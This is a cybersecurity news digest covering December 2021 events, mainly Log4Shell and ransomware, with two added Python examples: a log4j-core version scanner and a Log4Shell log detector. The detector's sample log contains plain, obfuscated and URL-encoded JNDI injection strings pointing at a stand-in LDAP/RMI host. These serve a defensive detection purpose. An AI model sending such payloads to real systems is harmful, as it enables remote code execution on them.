Cybersecurity Digest #40: 13/12/2021 – 24/12/2021

Cybersecurity news

  • Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux to address a high-severity zero-day vulnerability exploited in the wild. The update is rolling out worldwide in the Stable Desktop channel, although Google says it may take some time to reach all users.
  • Apache has released Log4j version 2.17.0 after discovering issues with the previous release, 2.16.0, which came out on Tuesday. Apache said version 2.16 “does not always protect from infinite recursion in lookup evaluation” and is vulnerable to CVE-2021-45105, a denial-of-service vulnerability rated “high” with a CVSS score of 7.5.
  • Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManuscrypt, which has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the Manuscrypt malware, part of the Lazarus APT group’s toolset, Kaspersky researchers said, characterizing the operation as a “mass-scale spyware attack campaign”.
  • Mozilla has fixed an issue in its Firefox browser where usernames and passwords were being recorded in the Windows Cloud Clipboard feature, which the organization categorized as a severe security risk: whenever a user copied or cut a password, the credential could have been exposed to non-owners.
  • Microsoft has warned customers to patch two Active Directory Domain Services privilege-escalation flaws that, when chained, allow attackers to easily take over Windows domains. The company addressed the two vulnerabilities (tracked as CVE-2021-42287 and CVE-2021-42278 and reported by Andrew Bartlett of Catalyst IT) in the November 2021 Patch Tuesday updates.
  • A new ransomware operation named Rook has recently appeared on the cybercrime scene, declaring a desperate need to make “a lot of money” by breaching corporate networks and encrypting devices. Although the introductory statements on its data leak portal were mildly humorous, the first victim announcements on the site have made it clear that Rook is not playing games.
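The Log4j item above gives a version threshold (2.17.0) but not a way to find the copies of log4j-core that are actually deployed, which in practice hide inside fat JARs and WARs. The scanner below is an added example written for this digest, not Apache's or any vendor's tool: it reads the Maven pom.properties that log4j-core ships inside its JAR, checks for the JndiLookup class, and recurses into nested archives. The JARs it inspects when run directly are constructed in memory (make_test_jar, make_fat_jar) so the example runs offline; point scan_path at a real directory to use it.

```python
"""Find log4j-core JARs that predate the 2.17.0 fix for CVE-2021-45105.

Added example for this digest; it is not Apache's or any vendor's scanner.
It reads the Maven pom.properties that log4j-core ships inside its JAR,
checks for the JndiLookup class, and recurses into nested archives
(Spring Boot fat JARs, WARs), which is where most missed copies hide.
"""
import io
import re
import zipfile
from pathlib import Path

FIXED_VERSION = (2, 17, 0)  # first 2.x mainline release without CVE-2021-45105
POM_RE = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(pom_properties):
    """Return (major, minor, patch) from a 'version=' line, or None if absent."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_archive(data, where="<root>", depth=0):
    """Return one finding per log4j-core (or stray JndiLookup class) found in the
    archive bytes `data`, recursing into nested archives up to three levels."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not an archive at all; nothing to report
    with zf:
        names = zf.namelist()
        version = None
        for name in names:
            if POM_RE.search(name):
                version = parse_version(zf.read(name).decode("utf-8", "replace"))
                break
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            # Threshold is the 2.x mainline fix named in the digest. The Java 7/6
            # maintenance branches (2.12.x, 2.3.x) have separate fixed releases,
            # so a hit on those branches needs a manual check against Apache's advisory.
            vulnerable = (version < FIXED_VERSION) if version is not None else has_jndi
            findings.append({"where": where, "version": version,
                             "jndi_lookup": has_jndi, "vulnerable": vulnerable})
        if depth < 3:
            for name in names:
                if name.lower().endswith(ARCHIVE_SUFFIXES):
                    findings += inspect_archive(zf.read(name), f"{where}/{name}", depth + 1)
    return findings


def scan_path(root):
    """Walk a directory tree and inspect every archive found under it."""
    hits = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            hits += inspect_archive(p.read_bytes(), str(p))
    return hits


# --- constructed fixtures so the example runs offline -------------------------

def make_test_jar(version, with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar with only the entries read above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                    f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def make_fat_jar(inner_jar, inner_name="BOOT-INF/lib/log4j-core.jar"):
    """Constructed Spring-Boot-style fat JAR that bundles `inner_jar` as a nested entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("BOOT-INF/classes/application.properties", "server.port=8080\n")
        zf.writestr(inner_name, inner_jar)
    return buf.getvalue()


if __name__ == "__main__":
    samples = [
        ("log4j-core-2.16.0.jar", make_test_jar("2.16.0")),
        ("log4j-core-2.17.0.jar", make_test_jar("2.17.0")),
        ("app.jar", make_fat_jar(make_test_jar("2.15.0"))),
    ]
    for label, blob in samples:
        for finding in inspect_archive(blob, label):
            flag = "VULNERABLE" if finding["vulnerable"] else "ok"
            print(f"{flag:10} {finding['where']} version={finding['version']}")
```

The version gate is the one the digest item states; a 2.17.0 JAR still contains JndiLookup.class, so the class check alone is not a verdict and is reported separately. Removing JndiLookup.class from older JARs was a widely used mitigation, and a JAR with an old version but no class is still flagged by version so that it gets reviewed rather than silently passed.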

Cybersecurity Blog Posts

  • Dotan BarNo dedicated his article to unused identities as a growing security threat. In early May 2021, Colonial Pipeline announced that it had been hacked: the attackers had breached its network via a compromised legacy VPN account. The author argues that this incident has nearly all the elements of security gone wrong.
  • SOC 2 has become the de facto standard for businesses in all industries to build trust and unlock sales. Most security professionals have experienced a SOC 2 audit and understand what goes into earning these coveted reports. AJ Yawn published An Expert’s Guide to Reviewing SOC 2 Reports.
  • (ISC)² experts published an article about system authorization. Based on NIST standards, system authorization formalizes the decision-making process, placing clear directives and accountability up front where they can be communicated and clearly documented. The (ISC)² CAP certification is designed to give individuals the credibility and practical knowledge to take on this role with confidence and competence.
  • Security Operations Centers can learn a lot from what IT operations learned during the SRE revolution. In the latest post of his series, Anton Chuvakin extracts lessons for the SOC from another SRE principle: evolving automation.

Research and analytics

  • Over the past year, the number of cyberattacks in every industry has grown sharply. To provide a comprehensive picture of modern cybercrime, Group-IB experts have prepared five cyber threat reports, Hi-Tech Crime Trends 2021/2022, each dedicated to one of the main threats that every business should consider. The reports are intended as a practical guide for strategic and tactical planning.
  • According to the Kaspersky Security Bulletin 2021 statistics, 15.45% of internet user computers worldwide experienced at least one Malware-class attack during 2021. Kaspersky solutions blocked 687,861,449 attacks launched from online resources across the globe.
  • Securelist by Kaspersky takes a deep dive into the evolution of ransomware in 2021, starting with the ransomware events that made the biggest headlines. From January to November 2021, the number of victims was 30% higher than in all of 2020, affecting a total of 1,500 organizations.
  • Researchers from the Technical University of Darmstadt and the University of Brescia have published the results of their research, Attacks on Wireless Coexistence: Exploiting Cross-Technology Performance Features for Inter-Chip Privilege Escalation. They demonstrate that a Bluetooth chip can directly extract network passwords and manipulate traffic on a co-located Wi-Fi chip.
  • Recognizing the significance of the Log4Shell vulnerability, SANS instructors Dr. Johannes Ullrich, Bojan Zdrnja, and Mick Douglas teamed up for a live stream to share what they had learned about exploitation, how to detect the attack, and how to protect environments from it. Given the buzz around the topic, SANS has published the recording of the live stream.
  • HackerOne, the hacker-powered security platform, announced that hackers have reported over 66,000 valid vulnerabilities this year, over 20% more than in 2020, with hacker-powered pentests seeing a 264% increase in reported vulnerabilities. This year’s report also shows bounty prices for high and critical vulnerabilities rising as organizations prioritize high-impact findings.
  • According to a DataDome study, mobile app and API threats are at a critical high, making bot protection a top priority for online commerce. Two thirds of online commerce respondents say mobile app and API protection are key priorities for 2022, 45% say the cost of man-hours to mitigate threats is the main impact of bot attacks, and 71% of bot attacks target high-profile events and promotions.
  • In this eBook, (ISC)² Certified Cloud Security Professionals draw on their day-to-day experience in the field to explain why a lack of qualified staff can be the biggest impediment to cloud adoption. The discussion centres on key results from the 2021 Cloud Security Report, sponsored by (ISC)², which is based on a survey of more than 750 cybersecurity professionals.
  • Check Point Research spotted the resurgence of Phorpiex, an old threat known for its sextortion spam campaigns, crypto-jacking, cryptocurrency clipping and ransomware spread. In one year, Phorpiex bots hijacked 969 transactions and stole 3.64 Bitcoin, 55.87 Ether, and $55,000 in ERC20 tokens, worth almost half a million US dollars in total.
  • Pulse and Vulcan Cyber surveyed 200 IT security decision-makers to find out how vulnerability risk is prioritized, managed and reduced. According to the research, security teams are not doing enough to correlate vulnerability data with actual business risk: most vulnerability management programs do not give business leaders and IT management the insight they need to focus protection on the assets that matter to the business, rather than treating every asset as equally relevant.
  • Organizations are increasingly relying on external support from managed services. To gain a better understanding of the state of managed services security, MITRE Engenuity commissioned Cybersecurity Insiders to run an extensive industry survey. The results, published as the 2021 Managed Services Report: No Rest for the Wary, show that organizations have substantially lower confidence in their managed services support than in their in-house technology, people, and processes.
  • Darktrace reported that the information technology (IT) and communications sector was the most targeted industry globally in 2021, as uncovered by Darktrace’s security researchers. Darktrace’s findings show that its artificial intelligence autonomously interrupted an average of 150,000 threats per week against the sector in 2021.
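The SANS item above covers detecting Log4Shell attempts, and the Conti and Khonsari incidents in the next section are what such detection is for. The detector below is an added example written for this digest, not SANS's or Apache's code. Log4j resolves lookups from the inside out, so attackers hide `${jndi:` behind `${lower:j}`, the `${::-j}` default-value syntax and URL encoding; a plain grep for `${jndi:` misses those. The code replays the obfuscation transforms before matching. The access-log lines it runs on are constructed (documentation IP ranges and example.com), not captured traffic.

```python
"""Detect Log4Shell (JNDI lookup) attempts in web server logs, including the
obfuscated forms seen in the wild.

Added example for this digest; it is not SANS's or Apache's code. Log4j
resolves lookups from the inside out, so attackers hide `${jndi:` behind
`${lower:j}`, `${::-j}` (default-value syntax) and URL encoding. The detector
replays those transforms before matching, which a plain `${jndi:` grep misses.
"""
import re
from urllib.parse import unquote

LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")           # innermost ${...} only
JNDI_RE = re.compile(r"\$\{jndi:(?P<uri>[a-z]+:[^}]*)\}", re.I)


def _resolve(body):
    """Evaluate one innermost lookup body the way Log4j would when the lookup is
    used purely for obfuscation. Other lookups are left untouched; this is a
    deliberate subset (env/sys/date lookups with real values are not modelled)."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                 # ${name:-default} and the bare ${::-x} trick
        return body.split(":-", 1)[1]
    return "${" + body + "}"


def normalize(text, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def detect(line):
    """Return details of a JNDI lookup in `line`, or None if none is present."""
    canonical = normalize(unquote(line))   # URL-decode first: %24%7Bjndi... is common
    m = JNDI_RE.search(canonical)
    if not m:
        return None
    uri = m.group("uri")
    return {"scheme": uri.split(":", 1)[0].lower(), "uri": uri, "raw": line}


def scan_log(lines):
    """Run detect() over an iterable of log lines; findings carry 1-based line numbers."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hit = detect(line)
        if hit:
            hit["line"] = number
            findings.append(hit)
    return findings


# Constructed access-log lines (documentation IP ranges) covering the plain,
# lower-lookup, default-value and URL-encoded variants, plus one benign request.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [14/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.12 - - [14/Dec/2021:10:01:09 +0000] "GET /?x=${${lower:j}${lower:n}${lower:d}i:'
    '${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '203.0.113.13 - - [14/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '203.0.113.14 - - [14/Dec/2021:10:01:15 +0000] '
    '"GET /%24%7Bjndi%3Adns%3A%2F%2Fexample.com%2Fd%7D HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup -> {hit['uri']}")
```

Two caveats for production use: the attacker-controlled string can land in any logged field (User-Agent, X-Forwarded-For, request path, form fields), so run the check over the whole line rather than one column, and the `dns:` scheme matters even though it cannot deliver a payload, because it is how attackers confirm a vulnerable host before sending the `ldap:` or `rmi:` stage.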

Major Cyber Incidents

  • Microsoft reported that threat actors are exploiting the critical Log4Shell vulnerability in Log4j (CVE-2021-44228) to deliver a new ransomware family called Khonsari on self-hosted Minecraft servers. Bitdefender said it has observed multiple attempts by attackers to exploit Log4Shell to deploy the Khonsari ransomware payload on Windows machines.
  • The Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines. The gang did not waste much time adopting the new attack vector and is the first “top-tier” operation known to weaponize the Log4j vulnerability.
  • Workforce management solutions provider Kronos disclosed that UKG solutions hosted in the ‘Kronos Private Cloud’ are unavailable due to a ransomware attack. UKG solutions that do not use the Kronos Private Cloud, including UKG Pro, UKG Ready, and UKG Dimensions, are unaffected.
  • A cyber-attack has been carried out against major German logistics provider Hellmann Worldwide Logistics. The security incident forced Hellmann to take its central data center offline. The company has also hired “external renowned security specialists” to investigate the attack.
  • A hacker group called Sharp Boys announced that it had hacked two Israeli hiking websites, leaking the information of 100,000 users and offering the information of around three million people for sale. The leaked data includes emails, addresses, photos and phone numbers. The two affected sites were Tiyuli and Lametayel. Tiyuli is a website that provides information on hiking, attractions, maps and places to sleep throughout Israel. Lametayel is a chain of hiking and sporting goods stores and its site also provides information on hiking.
  • Less than a week before the Christmas holiday, French IT services company Inetum Group was hit by a ransomware attack that, according to the company, had a limited impact on the business and its customers. Inetum Group did not disclose the name of the malware used, but according to Valéry Marchive, editor-in-chief at the French publication LeMagIT, the attackers used BlackCat ransomware, also known as ALPHV and Noberus.